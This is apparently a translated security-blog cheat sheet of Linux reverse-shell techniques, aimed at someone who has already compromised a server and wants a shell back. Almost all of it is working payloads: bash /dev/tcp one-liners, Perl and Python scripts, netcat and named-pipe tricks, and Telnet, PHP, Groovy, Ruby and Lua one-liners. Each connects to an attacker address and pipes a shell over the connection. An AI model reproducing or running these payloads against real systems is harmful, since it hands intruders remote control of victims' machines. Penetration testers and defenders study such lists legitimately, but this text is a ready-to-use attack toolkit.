Linux reverse shell techniques

When you land on a Linux server, the first move is usually to throw a shell back to your own machine so you can try overflows and other privilege-escalation attempts. This is a collection of commonly used reverse-shell techniques.

  • First, pick a TCP port that the target's firewall does not filter, and listen on it locally (the exact syntax depends on your nc build: traditional netcat wants `nc -lvp 4444`, the OpenBSD build wants `nc -lv 4444`):

attacker$ nc -l -v attackerip 4444
  • Bash

/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

The two forms above open a TCP connection through bash's /dev/tcp redirection, point stdout at it, and duplicate stdin and stderr onto the same descriptor. /dev/tcp is a bash redirection feature rather than a real device, so this fails when the shell is dash or another minimal sh.

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Here the socket is kept on a high-numbered descriptor (196) and a plain sh is started with its standard streams attached to it.

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done

This variant reads the connection line by line and executes each line as a command, sending output back over descriptor 5.
  • Perl

Does not depend on spawning /bin/sh -i (commands are run through Perl's system):

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If the target is Windows, use the same one-liner without the background fork:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Or upload a script:

#1.pl
use Socket;
$i="x.x.x.x";   # attacker IP
$p=8080;        # attacker port
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
{
  # attach stdin/stdout/stderr to the socket, then replace the process with a shell
  open(STDIN,">&S");
  open(STDOUT,">&S");
  open(STDERR,">&S");
  exec("/bin/sh -i");
};

  • Netcat

Whether this works depends on the nc build. Most Linux distributions ship nc by default, but, presumably for safety, the packaged build often lacks the -e option (it was compiled without the GAPING_SECURITY_HOLE define):

nc -e /bin/sh attackerip 4444

/bin/sh | nc attackerip 4444

Note that the second form only carries the shell's output over the socket; the shell still reads commands from its original stdin, so on its own it is not an interactive reverse shell.

Without -e, a named pipe can feed nc's output into a shell and the shell's output back into nc. If mkfifo is unavailable, `mknod /tmp/backpipe p` creates the same FIFO:

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
  • Python

#1.py
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",8080))   # attacker IP and port
# point stdin, stdout and stderr at the socket ...
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# ... then start an interactive shell that inherits them
p=subprocess.call(["/bin/sh","-i"])
#2.py
#!/usr/bin/env python3
import socket
import subprocess

HOST = '10.16.44.100'  # the attacker machine
PORT = 443             # the port the attacker is listening on
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect back to the attacker
s.connect((HOST, PORT))
# tell the attacker we are connected
s.send(b'[*] Connection Established!')
# command loop
while True:
    # receive one shell command
    data = s.recv(1024)
    # an empty read means the attacker closed the connection; "quit" ends the loop explicitly
    if not data or data.strip() == b'quit':
        break
    # run it through the shell; communicate() reads stdout and stderr together,
    # which avoids the deadlock of draining the two pipes one after the other
    proc = subprocess.Popen(data.decode(errors='replace'), shell=True,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdout_value, stderr_value = proc.communicate()
    # send the output back to the attacker
    s.sendall(stdout_value + stderr_value)
# close the socket
s.close()
  • Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p

Or with two connections, listening locally on both 4444 (commands go in) and 4445 (output comes out):

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

  • PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

This assumes the socket ends up on file descriptor 3 in the php process; if it does not, try 4, 5 or 6.
  • Java

The snippet below is Groovy syntax (as used in a Groovy script console) around the Java Runtime.exec API; the payload it launches is the fd-5 read loop from the Bash section:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
  • Ruby

Target on Linux:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Target on Windows (the same one-liner without the fork):

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

  • Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Reference:
https://www.waitalone.cn/linux-shell-rebound-under-way.html